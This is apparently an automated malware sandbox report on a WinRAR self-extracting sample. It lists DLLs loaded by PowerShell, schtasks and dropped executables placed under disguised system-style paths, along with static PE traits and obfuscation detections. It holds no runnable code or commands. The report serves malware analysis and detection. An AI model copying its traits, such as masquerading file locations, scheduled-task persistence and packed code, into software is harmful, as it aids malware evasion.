Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: version.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: ktmw32.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: wbemcomn.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: amsi.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: userenv.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: winnsi.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: textshaping.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: textinputframework.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: coreuicomponents.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: coremessaging.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: coremessaging.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: wintypes.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: wintypes.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: wintypes.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: rasapi32.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: rasman.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: rtutils.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: dpx.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: ntmarta.dll
Source: C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe	Section loaded: apphelp.dll

Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

Static file information: File size 6701051 > 1048576

Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: GargantuaN.exe, 00000001.00000000.1635712049.0000000000D83000.00000002.00000001.01000000.00000009.sdmp, GargantuaN.exe, 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp, GargantuaN.exe, 00000001.00000003.1637953778.0000000006D7B000.00000004.00000020.00020000.00000000.sdmp, GargantuaN.exe, 00000001.00000003.1638428127.00000000057FF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxzip64\Release\sfxzip.pdb source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe, 00000000.00000000.1628945437.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp, C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe, 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp

Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

File is packed with WinRar

Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

File created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_7103562

Jump to behavior

PE file contains sections with non-standard names

Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Static PE information: section name: .didat
Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Static PE information: section name: _RDATA
Source: GargantuanS.exe.0.dr	Static PE information: section name: .00cfg
Source: GargantuaN.exe.0.dr	Static PE information: section name: .didat
Source: nhxnqwkhmssh.exe.2.dr	Static PE information: section name: .00cfg

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D6F640 push ecx; ret	1_2_00D6F653
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D6EB78 push eax; ret	1_2_00D6EB96
Source: C:\Windows\System32\conhost.exe	Code function: 7_2_000001B0BB96ACDD push rcx; retf 003Fh	7_2_000001B0BB96ACDE
Source: C:\Windows\System32\conhost.exe	Code function: 7_2_000001B0BB99C6DD push rcx; retf 003Fh	7_2_000001B0BB99C6DE
Source: C:\PerfDll\hyperProviderSavesinto.exe	Code function: 8_2_00007FFD9BC4E40D pushfd ; ret	8_2_00007FFD9BC4E422
Source: C:\PerfDll\hyperProviderSavesinto.exe	Code function: 8_2_00007FFD9BC445D5 push eax; ret	8_2_00007FFD9BC445E9
Source: C:\PerfDll\hyperProviderSavesinto.exe	Code function: 8_2_00007FFD9BCE63DD push C181916Ch; ret	8_2_00007FFD9BCE63EE
Source: C:\PerfDll\hyperProviderSavesinto.exe	Code function: 8_2_00007FFD9BCE5013 push eax; ret	8_2_00007FFD9BCE5014
Source: C:\PerfDll\hyperProviderSavesinto.exe	Code function: 8_2_00007FFD9BCE26E8 push eax; ret	8_2_00007FFD9BCE26EF
Source: C:\PerfDll\hyperProviderSavesinto.exe	Code function: 8_2_00007FFD9BCE32B4 push edx; ret	8_2_00007FFD9BCE32B6
Source: C:\PerfDll\hyperProviderSavesinto.exe	Code function: 8_2_00007FFD9BCE367D push eax; ret	8_2_00007FFD9BCE367E
Source: C:\PerfDll\hyperProviderSavesinto.exe	Code function: 8_2_00007FFD9BCE019B push edx; ret	8_2_00007FFD9BCE019C
Source: C:\PerfDll\hyperProviderSavesinto.exe	Code function: 8_2_00007FFD9BCE357F push esp; retf	8_2_00007FFD9BCE3585
Source: C:\PerfDll\hyperProviderSavesinto.exe	Code function: 8_2_00007FFD9BCE495A push ecx; ret	8_2_00007FFD9BCE495B
Source: C:\PerfDll\hyperProviderSavesinto.exe	Code function: 8_2_00007FFD9BCE315C push edx; ret	8_2_00007FFD9BCE315D
Source: C:\PerfDll\hyperProviderSavesinto.exe	Code function: 8_2_00007FFD9BCE146F pushad ; ret	8_2_00007FFD9BCE1470
Source: C:\PerfDll\hyperProviderSavesinto.exe	Code function: 8_2_00007FFD9BCE148D pushad ; ret	8_2_00007FFD9BCE14A1
Source: C:\PerfDll\hyperProviderSavesinto.exe	Code function: 8_2_00007FFD9BCE2885 push eax; ret	8_2_00007FFD9BCE2886
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Code function: 9_2_00000216D26DACDD push rcx; retf 003Fh	9_2_00000216D26DACDE
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Code function: 9_2_00000216D270C6DD push rcx; retf 003Fh	9_2_00000216D270C6DE
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Code function: 20_2_00007FFD9BD163E3 push C181916Ch; ret	20_2_00007FFD9BD163EE
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Code function: 20_2_00007FFD9BD1357F push esp; retf	20_2_00007FFD9BD13585
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Code function: 20_2_00007FFD9BD1148C pushad ; ret	20_2_00007FFD9BD114A1
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Code function: 20_2_00007FFD9BD1146F pushad ; ret	20_2_00007FFD9BD11470
Source: C:\Windows\System32\cmd.exe	Code function: 38_2_00000150E905ACDD push rcx; retf 003Fh	38_2_00000150E905ACDE
Source: C:\Windows\System32\cmd.exe	Code function: 38_2_00000150E93FC6DD push rcx; retf 003Fh	38_2_00000150E93FC6DE
Source: C:\Windows\System32\conhost.exe	Code function: 40_2_00000267FCE7ACDD push rcx; retf 003Fh	40_2_00000267FCE7ACDE
Source: C:\Windows\System32\conhost.exe	Code function: 40_2_00000267FCEAC6DD push rcx; retf 003Fh	40_2_00000267FCEAC6DE
Source: C:\Windows\System32\PING.EXE	Code function: 45_2_000002359B50ACDD push rcx; retf 003Fh	45_2_000002359B50ACDE
Source: C:\Windows\System32\PING.EXE	Code function: 45_2_000002359B53C6DD push rcx; retf 003Fh	45_2_000002359B53C6DE
Source: C:\Windows\System32\winlogon.exe	Code function: 49_2_00000225DC62ACDD push rcx; retf 003Fh	49_2_00000225DC62ACDE

Source: hyperProviderSavesinto.exe.1.dr	Static PE information: section name: .text entropy: 7.557452107884656
Source: KZcLqgnLvRf.exe.8.dr	Static PE information: section name: .text entropy: 7.557452107884656
Source: RuntimeBroker.exe.8.dr	Static PE information: section name: .text entropy: 7.557452107884656
